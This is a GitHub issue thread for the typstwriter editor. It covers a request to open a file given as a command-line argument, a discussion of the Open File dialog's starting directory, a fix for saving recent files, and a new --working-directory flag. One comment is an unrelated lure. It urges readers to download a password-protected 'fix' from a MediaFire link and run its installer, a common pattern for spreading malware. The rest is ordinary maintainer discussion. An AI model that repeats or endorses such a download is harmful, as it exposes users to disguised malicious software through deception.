### ISSUE TITLE
Open commandline arg and current directory

### ISSUE THREAD

**Issue by hurzl** [Bzero/typstwriter#30]
Please 
1. open command line arg as file
2. on "Open File" start in current directory (where I started typstwriter)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Bzero** [comment]
> open command line arg as file

Yes, this sounds very useful.

> on "Open File" start in current directory (where I started typstwriter)

Since a42d1747bd943888f9129025bf7cd8e9aeb287fd the "Open File" dialog starts at the typstwriter internal working directory which is a behavior I think I would like to keep since it could be quite confusing if one navigates to a different directory inside the application but "Open File" still uses the original directory.

It is worth a thought to set the working directory to the current directory where typstwriter was started in however. There is a potential conflict with the `working_directory` config entry tough so we could either only set the working directory to the cli current directory if the `working_directory` config entry is not set or use a cli flag.

**Comment by hurzl** [comment]
Yes if `working_directory` is undefined would be enough. 
And if I can open via command line it's also fine.
And if it could remember the recent files, but I get:
```
util.py              read                       line 108 : Could not read file '/home/XXX/.config/typstwriter/recentFiles.txt'.
...
util.py              write                      line 117 : Could not write file '/home/XXX/.config/typstwriter/recentFiles.txt'
```
The directory is not created.

**Comment by Bzero** [comment]
> And if it could remember the recent files, but I get:
> 
> ```
> util.py              read                       line 108 : Could not read file '/home/XXX/.config/typstwriter/recentFiles.txt'.
> ...
> util.py              write                      line 117 : Could not write file '/home/XXX/.config/typstwriter/recentFiles.txt'
> ```
> 
> The directory is not created.

Thanks a lot for reporting this bug, it should now be resolved by #31.

**Comment by Bzero** [comment]
> open command line arg as file

This feature is now implemented by #32.

**Comment by Bzero** [comment]
With #40 you can now use the cli argument `working-directory` to set the working directory to the current directory:

`typstwriter --working-directory .`
